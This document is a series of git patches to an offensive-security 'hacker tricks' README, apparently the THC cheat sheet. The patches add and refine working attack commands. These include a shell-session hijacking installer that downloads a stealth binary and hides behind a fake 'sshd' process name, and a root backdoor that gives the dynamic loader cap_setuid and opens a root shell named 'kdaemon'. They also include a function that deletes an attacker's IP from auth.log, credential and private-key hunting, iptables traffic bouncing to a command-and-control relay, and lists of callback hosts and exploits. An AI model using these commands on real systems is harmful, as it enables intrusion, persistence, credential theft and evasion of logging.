([github](https://github.com/Azathothas/Toolpacks/tree/main), [hysp project](https://github.com/metis-os/hysp-pkgs)) 1. https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64 +2. https://lolbas-project.github.io/ (Windows) 1. https://iq.thc.org/cross-compiling-exploits Phishing From 150f1dd3b8be85e68dc06d097a0d8ecc80f6b1f4 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 30 Apr 2024 17:15:07 +0100 Subject: [PATCH 19/37] Update README.md --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index b928df7..5b0eb2f 100644 --- a/README.md +++ b/README.md @@ -90,7 +90,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [cryptsetup](#crypto-filesystem) 1. [EncFS](#encfs) 1. [Encrypting a file](#encrypting-file) -1. [SSH session sniffing and hijacking](#ssh-sniffing) +1. [Session sniffing and hijacking](#sniffing) 1. [Sniff a user's SHELL session](#session-sniffing) 2. [Sniff all SHELL sessions with dtrace](#dtrace) 2. [Sniff all SHELL sessions with eBPF](#bpf) @@ -1675,7 +1675,7 @@ wfind() { # Usage: wfind /etc /var /usr ``` -Find local passwords (using [noseyparker](https://github.com/praetorian-inc/noseyparker): +Find local passwords (using [noseyparker](https://github.com/praetorian-inc/noseyparker)): ```sh curl -o np -fsSL https://github.com/hackerschoice/binary/raw/main/tools/noseyparker-x86_64-static ./np scan . && \ @@ -1883,8 +1883,8 @@ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input. ``` --- - -## 10. SSH Sniffing + +## 10. Session sniffing and hijaking **10.i Sniff a user's SHELL session** From ae187ccbc70fc45a74bfb7dbe609620f544441c8 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 7 May 2024 09:51:00 +0100 Subject: [PATCH 20/37] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 5b0eb2f..491f409 100644 --- a/README.md +++ b/README.md @@ -1898,7 +1898,7 @@ command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \ && curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \ && chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \ && echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \ -&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m' +&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -fqaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m' ``` - Combined with zapper to hide command options from the process list. From 70b920fd8e51d69d1055f5ba03ce6fd240214f3a Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 10 May 2024 18:49:04 +0100 Subject: [PATCH 21/37] Update README.md --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 491f409..79cad8d 100644 --- a/README.md +++ b/README.md @@ -2069,7 +2069,8 @@ Many other services (for free) | OSINT Hacker Tools || | --- | --- | -| https://osint.sh | Free. Subdomain Finder, DNS History, Public S3 Buckets, Reverse IP, Certificate Search and much more | +| https://api.c99.nl | (PAID) Subdomain Finder, Phone-Lookup, CF Resolver, WAF Detector, IP2Host, and more...for $25/year. | +| https://osint.sh | Free. Subdomain Finder, DNS History, Public S3 Buckets, Reverse IP, Certificate Search, and more | | https://cli.fyi | Free. curl/json interface to many services. Try `curl cli.fyi/me` or `curl cli.fyi/thc.org`. | | https://check-your-website.server-daten.de | Free. TLS/DNS/Security check a domain. | | https://hackertarget.com/ip-tools/ | Free OSINT Service (Reverse IP, MTR, port scan, CMS scans, Vulnerability Scans, API support) | From ef70dc71f3950d925534855804f910b75cabdbb4 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 13 May 2024 09:46:21 +0100 Subject: [PATCH 22/37] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 79cad8d..37bfae0 100644 --- a/README.md +++ b/README.md @@ -2069,7 +2069,7 @@ Many other services (for free) | OSINT Hacker Tools || | --- | --- | -| https://api.c99.nl | (PAID) Subdomain Finder, Phone-Lookup, CF Resolver, WAF Detector, IP2Host, and more...for $25/year. | +| https://api.c99.nl | Free: [Subdomain Finder](https://subdomainfinder.c99.nl), (PAID) Phone-Lookup, CF Resolver, WAF Detector, IP2Host, and more...for $25/year. | | https://osint.sh | Free. Subdomain Finder, DNS History, Public S3 Buckets, Reverse IP, Certificate Search, and more | | https://cli.fyi | Free. curl/json interface to many services. Try `curl cli.fyi/me` or `curl cli.fyi/thc.org`. | | https://check-your-website.server-daten.de | Free. TLS/DNS/Security check a domain. | From 07be6795b24640779ea0baeef62caa2d7c13d296 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 13 May 2024 09:47:08 +0100 Subject: [PATCH 23/37] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 37bfae0..33d584d 100644 --- a/README.md +++ b/README.md @@ -2069,7 +2069,7 @@ Many other services (for free) | OSINT Hacker Tools || | --- | --- | -| https://api.c99.nl | Free: [Subdomain Finder](https://subdomainfinder.c99.nl), (PAID) Phone-Lookup, CF Resolver, WAF Detector, IP2Host, and more...for $25/year. | +| https://api.c99.nl | Free: [Subdomain Finder](https://subdomainfinder.c99.nl), PAID: Phone-Lookup, CF Resolver, WAF Detector, IP2Host, and more...for $25/year. | | https://osint.sh | Free. Subdomain Finder, DNS History, Public S3 Buckets, Reverse IP, Certificate Search, and more | | https://cli.fyi | Free. curl/json interface to many services. Try `curl cli.fyi/me` or `curl cli.fyi/thc.org`. | | https://check-your-website.server-daten.de | Free. TLS/DNS/Security check a domain. | From f807f77e5a03b3e323e738b0a1d18c21b16b0e26 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 14 May 2024 18:21:22 +0100 Subject: [PATCH 24/37] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 33d584d..1e328f4 100644 --- a/README.md +++ b/README.md @@ -1700,11 +1700,11 @@ find_subdomains() { [ $# -le 0 ] && { echo -en >&2 "Extract sub-domains from all files (or stdin)\nUsage : find_subdomains \nExample: find_subdomain \.com | anew"; return; } shift 1 [ $# -le 0 ] && [ -t 0 ] && set -- . - command -v rg >/dev/null && { rg -oaIN --no-heading "$rex" "$@" | grep -Eo "$rexf"; return; } + command -v rg >/dev/null && { rg -oaIN --no-heading "$rex" "$@" | grep -Eao "$rexf"; return; } grep -Eaohr "$rex" "$@" | grep -Eo "$rexf" } -# find_subdomain foobar.com -# find_subdomain @gmail.com +# find_subdomain foobar.com | anew +# find_subdomain @gmail.com | anew ``` --- From 3fdbe13af284e5ac86ebbc1ec3d68d81899d8009 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 14 May 2024 18:59:24 +0100 Subject: [PATCH 25/37] Update README.md --- README.md | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 1e328f4..8c54fd0 100644 --- a/README.md +++ b/README.md @@ -1693,17 +1693,18 @@ grep -r -F -- " PRIVATE KEY-----" . Find Subdomains or emails in files: ```bash +resolv() { while read -r x; do r="$(getent hosts "$x")" || continue; echo "${r%% *}"$'\t'"${x}"; done; } find_subdomains() { - local d="${1}" + local d="${1//./\\.}" local rexf='[0-9a-zA-Z_.-]{0,64}'"${d}" local rex="$rexf"'([^0-9a-zA-Z_]{1}|$)' - [ $# -le 0 ] && { echo -en >&2 "Extract sub-domains from all files (or stdin)\nUsage : find_subdomains \nExample: find_subdomain \.com | anew"; return; } + [ $# -le 0 ] && { echo -en >&2 "Extract sub-domains from all files (or stdin)\nUsage : find_subdomains \nExample: find_subdomain .com | anew"; return; } shift 1 [ $# -le 0 ] && [ -t 0 ] && set -- . command -v rg >/dev/null && { rg -oaIN --no-heading "$rex" "$@" | grep -Eao "$rexf"; return; } grep -Eaohr "$rex" "$@" | grep -Eo "$rexf" } -# find_subdomain foobar.com | anew +# find_subdomain .foobar.com | anew | resolv # find_subdomain @gmail.com | anew ``` From f109f069eeda44ac056c636ab10448f0d4338f53 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 14 May 2024 19:04:01 +0100 Subject: [PATCH 26/37] Update README.md --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 8c54fd0..b63e8a0 100644 --- a/README.md +++ b/README.md @@ -1678,8 +1678,9 @@ wfind() { Find local passwords (using [noseyparker](https://github.com/praetorian-inc/noseyparker)): ```sh curl -o np -fsSL https://github.com/hackerschoice/binary/raw/main/tools/noseyparker-x86_64-static +chmod 700 np && \ ./np scan . && \ -./np report +./np report --color=always | less -R ``` (Or use [PassDetective](https://github.com/aydinnyunus/PassDetective) to find passwords in ~/.*history) From 0d3dfba65a1dd7a4b2b4d62f20f8b5d2247faf6e Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 27 May 2024 13:21:04 +0100 Subject: [PATCH 27/37] Update README.md --- README.md | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index b63e8a0..45562ba 100644 --- a/README.md +++ b/README.md @@ -1800,9 +1800,10 @@ mount -o bind,ro /boot/backdoor.cgi /var/www/cgi/blah.cgi Needed for taking screenshots of X11 sessions (aka `xwd -root -display :0 | convert - jpg:screenshot.jpg`) ```bash -U=$(id -u UserName) ### <-- Set UserName -H="$(grep "$U" /etc/passwd | cut -d: -f6)" -HOME="${H:-/tmp}" python3 -c "import os;os.setuid(${U:?});os.execl('/bin/bash', '-bash')" +NAME="UserName" ### <-- Set UserName +U=$(id -u ${NAME:?}) \ +&& H="$(grep "$U" /etc/passwd | cut -d: -f6)" \ +&& HOME="${H:-/tmp}" python3 -c "import os;os.setuid(${U:?});os.execl('/bin/bash', '-bash')" # change -bash to bash to not make this a login shell. ``` From 4ec4852af6b918f4f105e826ce9b1ffb01d5b02c Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 31 May 2024 10:57:44 +0100 Subject: [PATCH 28/37] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 45562ba..2df77b3 100644 --- a/README.md +++ b/README.md @@ -2124,6 +2124,7 @@ OpSec 5. [EFF](https://www.eff.org/) - Clever advise for freedom figthers. Exploits +1. [ttyinject](https://github.com/hackerschoice/ttyinject) and [ptyspy](#10-session-sniffing-and-hijaking) for LPE. 1. [SploitScan](https://github.com/xaitax/SploitScan) - Exploit Score & PoC search (by xaitax) 1. [Traitor](https://github.com/liamg/traitor) - Tries various exploits/vulnerabilities to gain root (LPE) 1. [PacketStorm](https://packetstormsecurity.com) - Our favorite site ever since we shared a Pizza with fringe[at]dtmf.org in NYC in 2000 From 283b614ae74a4c87141e3191ba66fa573e11cf37 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 4 Jun 2024 11:28:46 +0100 Subject: [PATCH 29/37] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 2df77b3..f13d1c0 100644 --- a/README.md +++ b/README.md @@ -1687,7 +1687,7 @@ chmod 700 np && \ Using `grep`: ```sh # Find passwords (without garbage). -grep -HEronasi '.{16}password.{,64}' . +grep -HEronasi '.{,16}password.{,64}' . # Find TLS or OpenSSH keys: grep -r -F -- " PRIVATE KEY-----" . ``` From f447773fcea181bdf74905b34577fc80d6542d5f Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 11 Jun 2024 13:10:04 +0100 Subject: [PATCH 30/37] Update README.md --- README.md | 36 +++++++++++++++++++++++------------- 1 file changed, 23 insertions(+), 13 deletions(-) diff --git a/README.md b/README.md index f13d1c0..254de62 100644 --- a/README.md +++ b/README.md @@ -604,19 +604,29 @@ More: [https://github.com/twelvesec/port-forwarding](https://github.com/twelvese Use the host 192.168.0.100 as a Jump-Host: Forward any connection from anywhere to 192.168.0.100:53 onwards to 1.2.3.4:443. ```sh -FPORT=53 -DSTIP=1.2.3.4 -DPORT=443 -echo 1 >/proc/sys/net/ipv4/ip_forward +ipfwinit() { + echo 1 >/proc/sys/net/ipv4/ip_forward + echo 1 >/proc/sys/net/ipv4/conf/all/route_localnet + [ $# -le 0 ] && set -- "0.0.0.0/0" + while [ $# -gt 0 ]; do + iptables -t mangle -I PREROUTING -s "${1}" -p tcp -m addrtype --dst-type LOCAL -m conntrack ! --ctstate ESTABLISHED -j MARK --set-mark 1188 + shift 1 + done + iptables -t mangle -D PREROUTING -j CONNMARK --restore-mark >/dev/null 2>/dev/null + iptables -t mangle -I PREROUTING -j CONNMARK --restore-mark + iptables -I FORWARD -m mark --mark 1188 -j ACCEPT + iptables -t nat -I POSTROUTING -m mark --mark 1188 -j MASQUERADE + iptables -t nat -I POSTROUTING -m mark --mark 1188 -j CONNMARK --save-mark +} +ipfwinit # Allow EVERY IP to bounce +# ipfwinit "1.2.3.4/16" "6.6.0.0/16" # Only allow these SOURCE IP's to bounce +``` -iptables -t mangle -C PREROUTING -j CONNMARK --restore-mark || iptables -t mangle -I PREROUTING -j CONNMARK --restore-mark -iptables -t mangle -A PREROUTING -p tcp --dport ${FPORT:?} -m addrtype --dst-type LOCAL -j MARK --set-mark 1188 - -iptables -t nat -I PREROUTING -p tcp -m mark --mark 1188 -j DNAT --to ${DSTIP:?}:${DPORT:?} -iptables -I FORWARD -m mark --mark 1188 -j ACCEPT - -iptables -t nat -I POSTROUTING -m mark --mark 1188 -j MASQUERADE -iptables -t nat -I POSTROUTING -m mark --mark 1188 -j CONNMARK --save-mark +Then set forwards like so: +```sh +ipfw 31337 144.76.220.20 22 # Bounce 31337 to segfault's ssh port. +ipfw 31338 127.0.0.1 8080 # Bounce 31338 to the server's 8080 (localhost) +ipfw 53 213.171.212.212 443 # Bounce 53 to gsrn-relay on port 443 ``` We use this trick to reach the gsocket-relay-network (or TOR) from deep inside firewalled networks. @@ -626,7 +636,7 @@ GS_HOST=192.168.0.100 GS_PORT=53 ./deploy.sh ``` ```sh # Access the target -GS_HOST=1.2.3.4: GS_PORT=443 gs-netcat -i -s ... +GS_HOST=213.171.212.212 gs-netcat -i -s ... ``` --- From 97f10cfa7d6f93490006424da0abccdc781fe669 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 11 Jun 2024 13:41:20 +0100 Subject: [PATCH 31/37] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 254de62..50993b0 100644 --- a/README.md +++ b/README.md @@ -602,7 +602,7 @@ More: [https://github.com/twelvesec/port-forwarding](https://github.com/twelvese **3.iii.c Bouncing traffic with iptables** -Use the host 192.168.0.100 as a Jump-Host: Forward any connection from anywhere to 192.168.0.100:53 onwards to 1.2.3.4:443. +Bounce through a host/router without needing to run a userland proxy or forwarder: ```sh ipfwinit() { echo 1 >/proc/sys/net/ipv4/ip_forward From 2b618ece6753e7036ebcd742860622b58c458ff6 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 15 Jun 2024 19:37:00 +0100 Subject: [PATCH 32/37] Update README.md --- README.md | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 50993b0..58b1ca6 100644 --- a/README.md +++ b/README.md @@ -1612,7 +1612,7 @@ setcap cap_setuid+ep /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 Become root ```bash ### Execute as non-root user -/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/bin/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")' +exec /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/bin/python3 -c 'import os;os.setuid(0);os.execlp("bash", "kdaemon")' ``` @@ -1762,6 +1762,10 @@ This will reset the logfile to 0 without having to restart syslogd etc: This will remove any line containing the IP `1.2.3.4` from the log file: ```sh xlog() { local a=$(sed "/${1:?}/d" <"${2:?}") && echo "$a" >"${2:?}"; } +``` + +Examples: +```sh # xlog "1\.2\.3\.4" /var/log/auth.log # xlog "${SSH_CLIENT%% *}" /var/log/auth.log # xlog "^2023.* thc\.org" foo.log @@ -1813,7 +1817,7 @@ Needed for taking screenshots of X11 sessions (aka `xwd -root -display :0 | conv NAME="UserName" ### <-- Set UserName U=$(id -u ${NAME:?}) \ && H="$(grep "$U" /etc/passwd | cut -d: -f6)" \ -&& HOME="${H:-/tmp}" python3 -c "import os;os.setuid(${U:?});os.execl('/bin/bash', '-bash')" +&& HOME="${H:-/tmp}" python3 -c "import os;os.setuid(${U:?});os.execlp('bash', '-bash')" # change -bash to bash to not make this a login shell. ``` From 04928d143458efb364d4080be814ef9401f6d702 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 15 Jun 2024 21:37:58 +0100 Subject: [PATCH 33/37] Update README.md --- README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/README.md b/README.md index 58b1ca6..c8f3cc2 100644 --- a/README.md +++ b/README.md @@ -2185,7 +2185,6 @@ Tools 1. https://tmate.io/ - Share A screen with others Callback / Canary / Command & Control -1. http://dnslog.cn 1. https://app.interactsh.com 1. https://api.telegram.org 1. https://webhook.site From e42b642f012282568c5cdb3b31c40afe7419a94e Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 17 Jun 2024 17:13:47 +0100 Subject: [PATCH 34/37] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index c8f3cc2..a914dfe 100644 --- a/README.md +++ b/README.md @@ -1814,11 +1814,11 @@ mount -o bind,ro /boot/backdoor.cgi /var/www/cgi/blah.cgi Needed for taking screenshots of X11 sessions (aka `xwd -root -display :0 | convert - jpg:screenshot.jpg`) ```bash -NAME="UserName" ### <-- Set UserName +# NAME="UserName" ### <-- Set UserName U=$(id -u ${NAME:?}) \ && H="$(grep "$U" /etc/passwd | cut -d: -f6)" \ -&& HOME="${H:-/tmp}" python3 -c "import os;os.setuid(${U:?});os.execlp('bash', '-bash')" -# change -bash to bash to not make this a login shell. +&& HOME="${H:-/tmp}" python3 -c "import os;os.setuid(${U:?});os.execlp('bash', 'bash')" +# change bash to -bash to make this a login shell. ``` --- From 840a5cd1442ad9f723d161173444dd0fcd44efa5 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 17 Jun 2024 19:49:34 +0100 Subject: [PATCH 35/37] Update README.md --- README.md | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index a914dfe..8d892e8 100644 --- a/README.md +++ b/README.md @@ -1606,13 +1606,18 @@ curl http://127.0.0.1:8080/test.php -d 0="ps fax; uname -mrs; id" Stay root once you got root ```bash -### Execute as root user -setcap cap_setuid+ep /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 +setcap cap_setuid+ep /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 2>/dev/null \ +|| setcap cap_setuid+ep /lib64/ld-2.17.so 2>/dev/null \ +|| echo >&2 "FAILED. File not found" ``` Become root ```bash ### Execute as non-root user -exec /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/bin/python3 -c 'import os;os.setuid(0);os.execlp("bash", "kdaemon")' +p="python" +command -v python3 >/dev/null && p="python3" +[[ -f /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 ]] && l="/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2" +[[ -f /lib64/ld-2.17.so ]] && l="/lib64/ld-2.17.so" +exec "${l:?}" "$p" -c 'import os;os.setuid(0);os.execlp("bash", "kdaemon")' ``` From 68904b59e1e4b8e44f5e4398abe0c82a12133ea6 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 21 Jun 2024 09:49:08 +0100 Subject: [PATCH 36/37] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 8d892e8..2e7bcd0 100644 --- a/README.md +++ b/README.md @@ -1920,7 +1920,7 @@ command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \ && curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \ && chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \ && echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \ -&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -fqaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m' +&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && { ~/.config/.pty/ini -h && ~/.config/.pty/pty -V; } &>/dev/null && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -fqaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m' ``` - Combined with zapper to hide command options from the process list. From 008bc782d2706fdbea130e38b92c19a77cd9ab06 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 21 Jun 2024 10:01:08 +0100 Subject: [PATCH 37/37] Update README.md --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 2e7bcd0..bd933e5 100644 --- a/README.md +++ b/README.md @@ -1821,8 +1821,9 @@ Needed for taking screenshots of X11 sessions (aka `xwd -root -display :0 | conv ```bash # NAME="UserName" ### <-- Set UserName U=$(id -u ${NAME:?}) \ +G=$(id -g ${NAME:?}) \ && H="$(grep "$U" /etc/passwd | cut -d: -f6)" \ -&& HOME="${H:-/tmp}" python3 -c "import os;os.setuid(${U:?});os.execlp('bash', 'bash')" +&& HOME="${H:-/tmp}" python3 -c "import os;os.setgid(${G:?});os.setuid(${U:?});os.execlp('bash', 'bash')" # change bash to -bash to make this a login shell. ```